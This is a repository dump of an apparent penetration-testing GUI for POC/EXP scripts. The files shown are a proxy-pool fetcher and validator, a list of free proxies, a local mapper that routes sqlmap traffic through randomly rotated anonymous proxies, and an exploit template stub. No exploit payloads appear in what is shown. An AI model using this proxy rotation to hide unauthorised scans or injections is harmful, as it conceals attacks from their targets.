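    def anonymousValidator(cls, proxy):
        """True when every anonymous_validator accepts *proxy*; records the anonymity label either way."""
        for func in ProxyValidator.anonymous_validator:
            if not func(proxy):
                proxy.last_status = None
                proxy._anonymous = '透明'
                return False
        proxy._anonymous = '高匿'
        return True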
94 |
95 |
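class _ThreadChecker(Thread):
    """ Worker thread: drains target_queue, validates each proxy and records the passing ones. """

    threadLock = threading.Lock()
    # Class-level result list shared by every thread and every Checker() call;
    # nothing in this module ever clears it.
    temp_list = []

    def __init__(self, work_type, target_queue, thread_name):
        """
        :param work_type: label used in log lines ("raw"/"use")
        :param target_queue: queue.Queue of Proxy objects to check
        :param thread_name: thread name, also used in log lines
        """
        Thread.__init__(self, name=thread_name)
        self.work_type = work_type
        self.log = LogHandler("checker")
        # Persistence through ProxyHandler was removed in this fork; results only
        # land in temp_list.
        self.target_queue = target_queue
        self.conf = ConfigHandler()

    def run(self):
        label = self.work_type.title()
        self.log.info("{}ProxyCheck - {}: start".format(label, self.name))
        while True:
            try:
                proxy = self.target_queue.get(block=False)
            except Empty:
                self.log.info("{}ProxyCheck - {}: complete".format(label, self.name))
                break
            try:
                proxy = DoValidator.validator(proxy)
                if proxy.last_status or proxy.https:
                    self.log.info('RawProxyCheck - {}: {} pass'.format(self.name, proxy.proxy.ljust(23)))
                    # Serialise writes to the shared list; the lock existed but was unused.
                    with _ThreadChecker.threadLock:
                        _ThreadChecker.temp_list.append(proxy.proxy)
                else:
                    self.log.info('RawProxyCheck - {}: {} fail'.format(self.name, proxy.proxy.ljust(23)))
            finally:
                # Balance every get() even if validation raises, so a queue.join()
                # elsewhere cannot block forever.
                self.target_queue.task_done()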
156 |
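def Checker(tp='raw', queue=None, thread_count=20):
    """
    run Proxy ThreadChecker
    :param tp: raw/use
    :param queue: Proxy Queue
    :param thread_count: number of worker threads (was hard-coded to 20)
    :return: the shared _ThreadChecker.temp_list of proxies that passed —
        note it also holds results from earlier Checker() calls in this process
    """
    thread_list = [_ThreadChecker(tp, queue, "thread_%s" % str(index).zfill(2))
                   for index in range(thread_count)]

    for thread in thread_list:
        thread.daemon = True  # setDaemon() is deprecated since Python 3.10
        thread.start()

    for thread in thread_list:
        thread.join()

    return _ThreadChecker.temp_list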
--------------------------------------------------------------------------------
/Proxy/helper/fetch.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: fetchScheduler
5 | Description :
6 | Author : JHao
7 | date: 2019/8/6
8 | -------------------------------------------------
9 | Change Activity:
10 | 2019/08/06:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 | from Proxy.helper.proxy import Proxy
16 | from Proxy.helper.check import DoValidator
17 | from Proxy.handler.logHandler import LogHandler
18 | #from Proxy.handler.proxyHandler import ProxyHandler
19 | from Proxy.proxyFetcher import ProxyFetcher
20 | from Proxy.handler.configHandler import ConfigHandler
21 |
22 |
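class Fetcher(object):
    """Collect raw proxies from every configured fetcher and pre-filter them."""
    name = "fetcher"

    def __init__(self):
        self.log = LogHandler(self.name)
        self.conf = ConfigHandler()
        # Persistence through ProxyHandler was removed in this fork.

    def run(self):
        """
        fetch proxy with proxyFetcher
        Generator: yields one Proxy per distinct proxy string that passes
        DoValidator.preValidator.  A fetcher that raises is logged and skipped
        (they are plugins, so the broad except is the boundary here).
        :return:
        """
        proxy_dict = {}
        self.log.info("ProxyFetch : start")
        # NOTE(review): ConfigHandler.fetchers is commented out in
        # Proxy/handler/configHandler.py, so this attribute access raises
        # AttributeError until it is restored — confirm the intended source.
        for fetch_source in self.conf.fetchers:
            self.log.info("ProxyFetch - {func}: start".format(func=fetch_source))
            fetcher = getattr(ProxyFetcher, fetch_source, None)
            if not fetcher:
                self.log.error("ProxyFetch - {func}: class method not exists!".format(func=fetch_source))
                continue
            if not callable(fetcher):
                self.log.error("ProxyFetch - {func}: must be class method".format(func=fetch_source))
                continue

            try:
                for raw in fetcher():
                    # Strip before logging and keying, so the dict does not hold
                    # duplicates that differ only by whitespace.
                    proxy = raw.strip()
                    self.log.info('ProxyFetch - %s: %s ok' % (fetch_source, proxy.ljust(23)))
                    if proxy in proxy_dict:
                        proxy_dict[proxy].add_source(fetch_source)
                    else:
                        proxy_dict[proxy] = Proxy(proxy, source=fetch_source)
            except Exception as e:
                self.log.error("ProxyFetch - {func}: error".format(func=fetch_source))
                self.log.error(str(e))
        self.log.info("ProxyFetch - all complete!")
        for candidate in proxy_dict.values():
            # preValidator receives the bare "ip:port" string, not the Proxy object.
            if DoValidator.preValidator(candidate.proxy):
                yield candidate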
63 |
--------------------------------------------------------------------------------
/Proxy/helper/proxy.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: Proxy
5 | Description : 代理对象类型封装
6 | Author : JHao
7 | date: 2019/7/11
8 | -------------------------------------------------
9 | Change Activity:
10 | 2019/7/11: 代理对象类型封装
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 | import json
16 |
17 |
18 | class Proxy(object):
19 |
20 | def __init__(self, proxy, fail_count=0, region="", anonymous="",
21 | source="", check_count=0, last_status="", last_time="", https=False):
22 | self._proxy = proxy
23 | self._fail_count = fail_count
24 | self._region = region
25 | self._anonymous = anonymous
26 | self._source = source.split('/')
27 | self._check_count = check_count
28 | self._last_status = last_status
29 | self._last_time = last_time
30 | self._https = https
31 |
32 | @classmethod
33 | def createFromJson(cls, proxy_json):
34 | _dict = json.loads(proxy_json)
35 | return cls(proxy=_dict.get("proxy", ""),
36 | fail_count=_dict.get("fail_count", 0),
37 | region=_dict.get("region", ""),
38 | anonymous=_dict.get("anonymous", ""),
39 | source=_dict.get("source", ""),
40 | check_count=_dict.get("check_count", 0),
41 | last_status=_dict.get("last_status", ""),
42 | last_time=_dict.get("last_time", ""),
43 | https=_dict.get("https", False)
44 | )
45 |
46 | @property
47 | def proxy(self):
48 | """ 代理 ip:port """
49 | return self._proxy
50 |
51 | @property
52 | def fail_count(self):
53 | """ 检测失败次数 """
54 | return self._fail_count
55 |
56 | @property
57 | def region(self):
58 | """ 地理位置(国家/城市) """
59 | return self._region
60 |
61 | @property
62 | def anonymous(self):
63 | """ 匿名 """
64 | return self._anonymous
65 |
66 | @property
67 | def source(self):
68 | """ 代理来源 """
69 | return '/'.join(self._source)
70 |
71 | @property
72 | def check_count(self):
73 | """ 代理检测次数 """
74 | return self._check_count
75 |
76 | @property
77 | def last_status(self):
78 | """ 最后一次检测结果 True -> 可用; False -> 不可用"""
79 | return self._last_status
80 |
81 | @property
82 | def last_time(self):
83 | """ 最后一次检测时间 """
84 | return self._last_time
85 |
86 | @property
87 | def https(self):
88 | """ 是否支持https """
89 | return self._https
90 |
91 | @property
92 | def to_dict(self):
93 | """ 属性字典 """
94 | return {"proxy": self.proxy,
95 | "https": self.https,
96 | "fail_count": self.fail_count,
97 | "region": self.region,
98 | "anonymous": self.anonymous,
99 | "source": self.source,
100 | "check_count": self.check_count,
101 | "last_status": self.last_status,
102 | "last_time": self.last_time}
103 |
104 | @property
105 | def to_json(self):
106 | """ 属性json格式 """
107 | return json.dumps(self.to_dict, ensure_ascii=False)
108 |
@fail_count.setter
def fail_count(self, value):
    """Overwrite the failure counter; no validation is applied to value."""
    self._fail_count = value
112 |
@check_count.setter
def check_count(self, value):
    """Overwrite the check counter; no validation is applied to value."""
    self._check_count = value
116 |
@last_status.setter
def last_status(self, value):
    """Record the outcome of the latest check (expected True/False, not enforced)."""
    self._last_status = value
120 |
@last_time.setter
def last_time(self, value):
    """Record when the latest check happened; stored as given."""
    self._last_time = value
124 |
@https.setter
def https(self, value):
    """Record the HTTPS check outcome; stored as given."""
    self._https = value
128 |
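def add_source(self, source_str):
    """Record another source for this proxy, keeping the list free of duplicates.

    Args:
        source_str: name of the fetcher the proxy was seen on; falsy values are ignored.

    Deduplication preserves first-seen order (dict.fromkeys) instead of going
    through a set, so the ``source`` property renders the same string on every
    run rather than in arbitrary set order.
    """
    if not source_str:
        return
    self._source = list(dict.fromkeys(self._source + [source_str]))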
133 |
--------------------------------------------------------------------------------
/Proxy/helper/validator.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: _validators
5 | Description : 定义proxy验证方法
6 | Author : JHao
7 | date: 2021/5/25
8 | -------------------------------------------------
9 | Change Activity:
10 | 2021/5/25:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 | from re import findall
16 | from requests import head,get
17 | from Proxy.util.six import withMetaclass
18 | from Proxy.util.singleton import Singleton
19 | from Proxy.handler.configHandler import ConfigHandler
20 | import json
21 |
# Shared config accessor; the validators below read httpUrl/httpsUrl/verifyTimeout from it.
conf = ConfigHandler()

# Fixed browser-like headers sent with every validation request. Because the
# User-Agent is constant, validation traffic is trivially recognisable on the
# target side; change it here if that matters for your deployment.
HEADER = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0',
          'Accept': '*/*',
          'Connection': 'keep-alive',
          'Accept-Language': 'zh-CN,zh;q=0.8'}
28 |
29 |
class ProxyValidator(withMetaclass(Singleton)):
    """Registry of validator callables, one list per check stage.

    The four lists are class attributes, so a registration is visible
    process-wide regardless of which instance (the Singleton metaclass makes
    them the same object anyway) is used. Every add* classmethod works as a
    decorator: it appends the function to its list and returns it unchanged.
    """
    pre_validator = []
    http_validator = []
    https_validator = []
    anonymous_validator = []

    @staticmethod
    def _register(bucket, func):
        """Append func to bucket and hand it back so decorator syntax keeps the name bound."""
        bucket.append(func)
        return func

    @classmethod
    def addPreValidator(cls, func):
        """Register func in pre_validator."""
        return cls._register(cls.pre_validator, func)

    @classmethod
    def addHttpValidator(cls, func):
        """Register func in http_validator."""
        return cls._register(cls.http_validator, func)

    @classmethod
    def addHttpsValidator(cls, func):
        """Register func in https_validator."""
        return cls._register(cls.https_validator, func)

    @classmethod
    def addAnonymousValidator(cls, func):
        """Register func in anonymous_validator."""
        return cls._register(cls.anonymous_validator, func)
55 |
56 |
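@ProxyValidator.addPreValidator
def formatValidator(proxy):
    """Accept only a bare ``A.B.C.D:port`` string with in-range octets and port.

    Args:
        proxy: candidate string as scraped from a source.
    Returns:
        True when the entire string is one dotted quad plus port, every octet is
        0-255 and the port is 1-65535; False for anything else, including a
        scheme prefix, surrounding text, non-ASCII digits or a non-str value.
    """
    verify_regex = r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}"
    if not isinstance(proxy, str):
        return False
    # \d also matches non-ASCII digit characters; keep them away from int()
    if any(ch not in "0123456789.:" for ch in proxy):
        return False
    _proxy = findall(verify_regex, proxy)
    if len(_proxy) != 1 or _proxy[0] != proxy:
        return False
    host, port = proxy.split(":")
    # the regex only bounds digit counts; enforce the numeric ranges as well
    if not all(int(octet) <= 255 for octet in host.split(".")):
        return False
    return 1 <= int(port) <= 65535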
63 |
64 |
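@ProxyValidator.addHttpValidator
def httpTimeOutValidator(proxy):
    """HTTP reachability check: True when a HEAD to conf.httpUrl via the proxy returns 200.

    Args:
        proxy: object exposing ``.proxy`` as ``ip:port``.
    Returns:
        bool. Any exception raised by the request (timeout, connection refused,
        malformed response, ...) is reported as False rather than propagated,
        so one bad proxy cannot abort a validation run.
    """
    proxies = {"http": "http://{proxy}".format(proxy=proxy.proxy), "https": "https://{proxy}".format(proxy=proxy.proxy)}
    try:
        r = head(conf.httpUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout)
    except Exception:
        return False
    return r.status_code == 200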
78 |
79 |
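@ProxyValidator.addHttpsValidator
def httpsTimeOutValidator(proxy):
    """HTTPS reachability check: True when a HEAD to conf.httpsUrl via the proxy returns 200.

    Args:
        proxy: object exposing ``.proxy`` as ``ip:port``.
    Returns:
        bool; any request exception is reported as False, not propagated.

    Note: verify=False disables TLS certificate validation for this probe. A
    proxy that terminates and re-encrypts TLS with its own certificate will
    therefore still pass as "supports https"; switch to verify=True if the
    pool must only contain proxies that tunnel TLS end-to-end.
    """
    proxies = {"http": "http://{proxy}".format(proxy=proxy.proxy), "https": "https://{proxy}".format(proxy=proxy.proxy)}
    try:
        r = head(conf.httpsUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout, verify=False)
    except Exception:
        return False
    return r.status_code == 200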
92 |
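@ProxyValidator.addAnonymousValidator
def customValidatorExample(proxy):
    """Example custom validator: high-anonymity check, returns True/False.

    A GET to conf.httpUrl is sent through the proxy and the proxy is accepted
    only when the response is 200 and the body contains no comma. NOTE(review):
    this presumably relies on the target echoing a comma-separated address list
    when the proxy forwards the client IP -- confirm against the response format
    of the configured URL before relying on it. verify=False has no effect on a
    plain-http URL and only matters if conf.httpUrl is switched to https.

    Args:
        proxy: object exposing ``.proxy`` as ``ip:port``.
    Returns:
        bool; any request exception is reported as False, not propagated.
    """
    proxies = {"http": "http://{proxy}".format(proxy=proxy.proxy), "https": "https://{proxy}".format(proxy=proxy.proxy)}
    try:
        r = get(conf.httpUrl, headers=HEADER, proxies=proxies, timeout=conf.verifyTimeout, verify=False)
    except Exception:
        return False
    return r.status_code == 200 and ',' not in r.text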
105 |
--------------------------------------------------------------------------------
/Proxy/ips.txt:
--------------------------------------------------------------------------------
1 | {"proxy": "47.57.188.208:80", "https": "HTTP", "anonymous": "\u900f\u660e"}
2 | {"proxy": "112.6.117.135:8085", "https": "HTTP", "anonymous": "\u9ad8\u533f"}
3 | {"proxy": "112.6.117.178:8085", "https": "HTTP", "anonymous": "\u9ad8\u533f"}
4 | {"proxy": "152.136.62.181:9999", "https": "HTTP", "anonymous": "\u9ad8\u533f\u540d"}
5 | {"proxy": "183.247.207.225:30001", "https": "HTTP", "anonymous": "\u9ad8\u533f\u540d"}
6 |
--------------------------------------------------------------------------------
/Proxy/log/Apache Shiro:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/log/Apache Shiro
--------------------------------------------------------------------------------
/Proxy/log/test.log:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/Proxy/log/test.log
--------------------------------------------------------------------------------
/Proxy/proxySetting.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: setting.py
5 | Description : 配置文件
6 | Author : JHao
7 | date: 2019/2/15
8 | -------------------------------------------------
9 | Change Activity:
10 | 2019/2/15:
11 | -------------------------------------------------
12 | """
13 |
BANNER = r"""
****************************************************************
*** ______ ********************* ______ *********** _ ********
*** | ___ \_ ******************** | ___ \ ********* | | ********
*** | |_/ / \__ __ __ _ __ _ | |_/ /___ * ___ | | ********
*** | __/| _// _ \ \ \/ /| | | || __// _ \ / _ \ | | ********
*** | | | | | (_) | > < \ |_| || | | (_) | (_) || |___ ****
*** \_| |_| \___/ /_/\_\ \__ |\_| \___/ \___/ \_____/ ****
**** __ / / *****
************************* /___ / *******************************
************************* ********************************
****************************************************************
"""

VERSION = "2.3.0"

# ############### server config ###############
#HOST = "0.0.0.0"

#PORT = 5010

# ############### database config ###################
# db connection uri
# example:
#     Redis: redis://:password@ip:port/db
#     Ssdb:  ssdb://:password@ip:port
# (keep real credentials out of this file if it is committed; the line below is
#  an illustrative placeholder, not a working value)
#DB_CONN = 'redis://:pwd@127.0.0.1:6379/0'

# proxy table name
#TABLE_NAME = 'use_proxy'


# ###### config the proxy fetch function ######
#PROXY_FETCHER = [
#    "freeProxy01",
#    "freeProxy02",
#    "freeProxy03",
#    # "freeProxy04",
#    "freeProxy05",
#    "freeProxy06",
#    "freeProxy07",
#    "freeProxy08",
#    "freeProxy09",
#    "freeProxy13",
#    "freeProxy14"
#]

# ############# proxy validator #################
# Target URLs that every candidate proxy is validated against (presumably
# exposed to the validators as conf.httpUrl / conf.httpsUrl via ConfigHandler).
# These are third-party hosts: each validation request, and the proxy's view of
# it, goes to them. Point these at an endpoint you control to keep validation
# traffic and the list of proxies you use in-house.
HTTP_URL = "http://httpbin.org/ip"

HTTPS_URL = "https://httpbin.org/ip"

# Per-request timeout (seconds) used while validating a proxy
VERIFY_TIMEOUT = 5

# Maximum failures allowed in the last PROXY_CHECK_COUNT checks; a proxy that
# exceeds it is removed. 0 means a single failed check evicts the proxy.
MAX_FAIL_COUNT = 0

# Maximum failure rate allowed in the last PROXY_CHECK_COUNT checks; exceeding it removes the proxy
# MAX_FAIL_RATE = 0.1

# proxyCheck triggers a fetch when fewer than POOL_SIZE_MIN proxies remain
POOL_SIZE_MIN = 20

# ############# scheduler config #################

# Set the timezone for the scheduler forcely (optional)
# If it is running on a VM, and
# "ValueError: Timezone offset does not match system offset"
# was raised during scheduling.
# Please uncomment the following line and set a timezone for the scheduler.
# Otherwise it will detect the timezone from the system automatically.

TIMEZONE = "Asia/Shanghai"
--------------------------------------------------------------------------------
/Proxy/sqlmap_auto_proxy.bat:
--------------------------------------------------------------------------------
REM Start the local proxy mapper (sqlmap_auto_proxy.py); pause keeps the console open afterwards.
python3 sqlmap_auto_proxy.py
pause
--------------------------------------------------------------------------------
/Proxy/sqlmap_auto_proxy.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | # from hutaow
3 | import sys
4 | import socket
5 | import logging
6 | import threading
7 | import random
8 | import json
# Listen address of the mapping service. Loopback only: the listener is never
# reachable from other hosts, and the mapper does no authentication of its own.
local_ip = '127.0.0.1'
local_port = 9999
# bytes requested per recv() in tcp_mapping_worker
PKT_BUFF_SIZE = 2048
# Dedicated logger writing to stderr at DEBUG; every relayed chunk is logged at INFO.
logger = logging.getLogger("Proxy Logging")
formatter = logging.Formatter('%(name)-12s %(asctime)s %(levelname)-8s %(lineno)-4d %(message)s', '%Y %b %d %a %H:%M:%S',)
stream_handler = logging.StreamHandler(sys.stderr)
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
logger.setLevel(logging.DEBUG)
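def _peer_name(conn):
    """Best-effort peer address for log lines; '?' once the socket is gone."""
    try:
        return conn.getpeername()
    except OSError:
        return '?'


def tcp_mapping_worker(conn_receiver, conn_sender):
    """Relay bytes from conn_receiver to conn_sender until either side ends.

    Runs in its own thread (started by tcp_mapping_request), one per direction.
    Args:
        conn_receiver: socket read from, PKT_BUFF_SIZE bytes per recv().
        conn_sender: socket the data is forwarded to with sendall().
    Returns None. Both sockets are closed on exit (finally), so the thread
    relaying the opposite direction sees fileno() == -1 and stops as well.
    """
    try:
        while True:
            if conn_receiver.fileno() == -1 or conn_sender.fileno() == -1:
                logger.debug('Socket has closed. ')
                return
            try:
                data = conn_receiver.recv(PKT_BUFF_SIZE)
            except Exception as e:
                logger.debug('Connection closed. %s' % e)
                break
            if not data:
                logger.info('No more data is received.')
                break
            try:
                conn_sender.sendall(data)
            except Exception as e:
                logger.error('Failed sending data. %s' % e)
                break
            # getpeername() raises once the other thread has closed the socket;
            # guard it so a log line can't kill the relay with the fds left open
            logger.info('Mapping > %s -> %s > %d bytes.', _peer_name(conn_receiver), _peer_name(conn_sender), len(data))
    finally:
        conn_receiver.close()
        conn_sender.close()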
43 |
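def tcp_mapping_request(local_conn, remote_ip, remote_port):
    """Connect to a proxy and wire it to local_conn with two relay threads.

    Args:
        local_conn: the accepted client socket.
        remote_ip, remote_port: proxy tried first; after the per-proxy retries
            are spent another entry is drawn at random from the module-level
            pool ``a``.
    Returns None. When every attempt fails the client socket is closed and the
    request is dropped. On success two tcp_mapping_worker threads are started,
    and they own (and eventually close) both sockets.
    """
    # how many times a different proxy may be drawn from the pool
    retry_sock = 2
    # connection attempts left for the current proxy
    retry_count = 1
    while True:
        remote_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            # NOTE(review): this 2 s timeout stays on the socket after connect(),
            # so the relay's recv() in tcp_mapping_worker also gives up after
            # 2 s of silence -- confirm that is intended.
            remote_conn.settimeout(2)
            remote_conn.connect((remote_ip, remote_port))
        except Exception:
            # a socket whose connect() failed is never reused: release it now
            # instead of leaking one descriptor per retry
            remote_conn.close()
            if retry_count > 0:
                logger.error('Unable to connect to the remote server. Number of retries remaining %s' % retry_count)
                retry_count -= 1
                continue
            if retry_sock > 0:
                # fresh retry budget for the next proxy, one switch used up
                retry_count = 1
                retry_sock -= 1
                proxyip = random.choice(a)
                print("[!]Switch proxy ip:" + str(proxyip))
                remote_ip, remote_port = proxyip[0], proxyip[1]
                continue
            # pool exhausted for this request: give up and drop the client
            logger.info('Proxy is not stability.')
            local_conn.close()
            return
        threading.Thread(target=tcp_mapping_worker, args=(local_conn, remote_conn)).start()
        threading.Thread(target=tcp_mapping_worker, args=(remote_conn, local_conn)).start()
        return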
79 |
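def Loadips(path='ips.txt'):
    """Read the proxy pool file and return it as a list of (ip, port) tuples.

    Args:
        path: file with one JSON object per line, each carrying a "proxy" key
            of the form "ip:port" (default: ips.txt in the current directory).
            Blank lines are skipped.
    Returns:
        list of (str, int).
    Raises:
        ValueError: a line is not valid JSON, lacks an "ip:port" value, or the
            port is not an integer.
    """
    ip_list = []
    with open(path, encoding='utf-8') as ips:
        for line in ips:
            line = line.strip()
            if not line:
                continue
            proxy = json.loads(line).get("proxy", "")
            host, _, port = proxy.rpartition(":")
            # int(), not eval(): the port is data read from a file and must
            # never be evaluated as Python code
            ip_list.append((host, int(port)))
    return ip_list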
92 |
93 | a = Loadips()
94 |
if __name__ == '__main__':
    # Entry point: accept local clients and hand each one to a randomly chosen proxy.
    print(a)
    local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    local_server.bind((local_ip, local_port))
    local_server.listen(5)
    logger.debug('Starting mapping service on %s:%s ...' % (local_ip, local_port))
    while True:
        try:
            local_conn, local_addr = local_server.accept()
            proxyip = random.choice(a)
            print("[!]Now proxy ip:" + str(proxyip))
            prip, prpo = proxyip[0], proxyip[1]
        except Exception:
            # accept() failed (e.g. Ctrl-C): shut the listener and leave
            local_server.close()
            logger.debug('Stop mapping service.')
            break
        threading.Thread(target=tcp_mapping_request, args=(local_conn, prip, prpo)).start()
        logger.debug('Receive mapping request from %s:%d.' % local_addr)
--------------------------------------------------------------------------------
/Proxy/util/__init__.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: __init__
5 | Description :
6 | Author : JHao
7 | date: 2020/7/6
8 | -------------------------------------------------
9 | Change Activity:
10 | 2020/7/6:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
--------------------------------------------------------------------------------
/Proxy/util/lazyProperty.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: lazyProperty
5 | Description :
6 | Author : JHao
7 | date: 2016/12/3
8 | -------------------------------------------------
9 | Change Activity:
10 | 2016/12/3:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 |
class LazyProperty(object):
    """
    Non-data descriptor that computes a value once and caches it on the instance.
    explain: http://www.spiderpy.cn/blog/5/

    Because no __set__ is defined, the value written into the instance's own
    namespace shadows the descriptor on every later attribute lookup, so the
    wrapped function runs at most once per instance.
    """

    def __init__(self, func):
        self.func = func

    def __get__(self, instance, owner):
        # class-level access returns the descriptor itself
        if instance is None:
            return self
        result = self.func(instance)
        setattr(instance, self.func.__name__, result)
        return result
32 |
--------------------------------------------------------------------------------
/Proxy/util/singleton.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: singleton
5 | Description :
6 | Author : JHao
7 | date: 2016/12/3
8 | -------------------------------------------------
9 | Change Activity:
10 | 2016/12/3:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 |
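class Singleton(type):
    """
    Singleton Metaclass: the first call to a class builds its instance and
    every later call returns that same object.

    Instances are cached in ``_inst`` keyed by class. The check-then-create is
    not locked, so two threads racing on the very first call of a class could
    each build an instance.
    """

    _inst = {}

    def __call__(cls, *args, **kwargs):
        if cls not in cls._inst:
            # forward keyword arguments as well; they used to be accepted and dropped
            cls._inst[cls] = super(Singleton, cls).__call__(*args, **kwargs)
        return cls._inst[cls]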
27 |
--------------------------------------------------------------------------------
/Proxy/util/six.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | """
3 | -------------------------------------------------
4 | File Name: six
5 | Description :
6 | Author : JHao
7 | date: 2020/6/22
8 | -------------------------------------------------
9 | Change Activity:
10 | 2020/6/22:
11 | -------------------------------------------------
12 | """
13 | __author__ = 'JHao'
14 |
15 | import sys
16 |
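PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3

# iteritems: a lazy (key, value) iterator on both major versions
if PY3:
    def iteritems(d, **kw):
        return iter(d.items(**kw))
else:
    def iteritems(d, **kw):
        return d.iteritems(**kw)

if PY3:
    from urllib.parse import urlparse
else:
    from urlparse import urlparse

if PY3:
    # importlib.reload (3.4+) replaces the deprecated imp module, which no
    # longer exists on Python 3.12, so the old `from imp import reload` fails there
    from importlib import reload as reload_six
else:
    reload_six = reload

if PY3:
    from queue import Empty, Queue
else:
    from Queue import Empty, Queue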
41 |
42 |
def withMetaclass(meta, *bases):
    """Create a base class with a metaclass.

    Returns a throwaway class whose metaclass intercepts the first subclass
    definition and rebuilds that subclass directly as ``meta(name, bases, d)``,
    so ``class C(withMetaclass(M, B))`` yields a C of type M with bases B on
    both Python 2 and 3.
    """

    class MetaClass(meta):
        # one-shot metaclass: replaces itself with `meta` for the real class

        def __new__(cls, name, this_bases, d):
            return meta(name, bases, d)

    temporary = type.__new__(MetaClass, 'temporary_class', (), {})
    return temporary
55 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Welcome to CodeTest
2 |
3 | ### :point_right:关于本项目
4 |
5 | >本项目的主要目的: 针对日常收集的Python POC\EXP测试脚本,使用可视化界面统一执行入口,方便运行。
6 | >
7 | >本项目适合人群: 有Python基础的渗透测试人员(工具自带简易编辑器,可修改脚本内参数,重新加载后可灵活使用脚本进行测试)
8 | >
9 | >可视化界面开发库: Tkinter
10 | >
11 | >python版本: 3.5+
12 |
13 | ### :bulb:POC\EXP 参考链接
14 |
15 | ```
16 | https://github.com/Ascotbe/Medusa
17 | https://github.com/zhzyker/vulmap
18 | https://github.com/Python3WebSpider/ProxyPool
19 | ```
20 |
21 |
22 | ### :book:使用说明
23 |
24 | ```
25 | (一)下载文件
26 | git clone https://github.com/codeyso/CodeTest.git
27 | cd CodeTest
28 |
29 | (二)安装依赖
30 | pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
31 | 注意: ~\Python3\Lib\site-packages,找到这个路径,下面有一个文件夹叫做crypto,将小写c改成大写C
32 | 注意: 建议安装之前更新pip (python -m pip install --upgrade pip)
33 |
34 | (三)使用工具
35 | 1) 双击 CodeTest.bat
36 | 2) pythonw3 -B CodeTest.pyw
37 |
38 | (四)备注: 如果GitHub图片显示不出来,修改hosts
39 | C:\Windows\System32\drivers\etc\hosts
40 |
41 | 在文件末尾添加
42 | # GitHub Start
43 | 192.30.253.112 github.com
44 | 192.30.253.119 gist.github.com
45 | 151.101.184.133 assets-cdn.github.com
46 | 151.101.184.133 raw.githubusercontent.com
47 | 151.101.184.133 gist.githubusercontent.com
48 | 151.101.184.133 cloud.githubusercontent.com
49 | 151.101.184.133 camo.githubusercontent.com
50 | 151.101.184.133 avatars0.githubusercontent.com
51 | 151.101.184.133 avatars1.githubusercontent.com
52 | 151.101.184.133 avatars2.githubusercontent.com
53 | 151.101.184.133 avatars3.githubusercontent.com
54 | 151.101.184.133 avatars4.githubusercontent.com
55 | 151.101.184.133 avatars5.githubusercontent.com
56 | 151.101.184.133 avatars6.githubusercontent.com
57 | 151.101.184.133 avatars7.githubusercontent.com
58 | 151.101.184.133 avatars8.githubusercontent.com
59 |
60 | # GitHub End
61 | ```
62 |
63 |
64 | ### :checkered_flag:模板
65 | #### POC
66 |
67 | ```
68 | def check(**kwargs):
69 | url = kwargs['url']#/*str*/
70 | print('输出结果')
71 | print(url)
72 | '''此处的返回状态码用于批量验证
73 | if True:
74 | return 1
75 | else:
76 | return
77 | '''
78 | ```
79 |
80 |
81 | #### EXP
82 |
83 | ```
84 | 有专用的EXP生成界面
85 | ```
86 |
87 |
88 | ### :clipboard:功能界面
89 | #### 漏洞扫描界面
90 | 
91 |
92 | #### 漏洞利用界面
93 | 
94 |
95 | ### :open_file_folder:使用示例
96 | >案例参考:https://mp.weixin.qq.com/s/xwh81ZeE0Lgx-iIpqZI1_g
97 |
98 |
--------------------------------------------------------------------------------
/Template/EXP.j2:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from operator import methodcaller
3 | import prettytable as pt
4 | """
5 | import util.globalvar as GlobalVar
6 | from ClassCongregation import ysoserial_payload,Dnslog
7 | DL = Dnslog()
8 | DL.dns_host()
9 | DL.result()
10 | """
class {{service.entry_nodes.vulname}}():
    """Generated exploit wrapper for {{service.entry_nodes.vulname}}; one method per CVE/POC name."""

    def __init__(self, **env):
        """
        Store the run parameters handed in by the launcher: url, cookie, cmd,
        pocname, vuln, timeout, retry_time, retry_interval and status.
        timeout/retry_time/retry_interval are coerced with int(), so a missing
        one raises here rather than during the request.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.status = env.get('status')

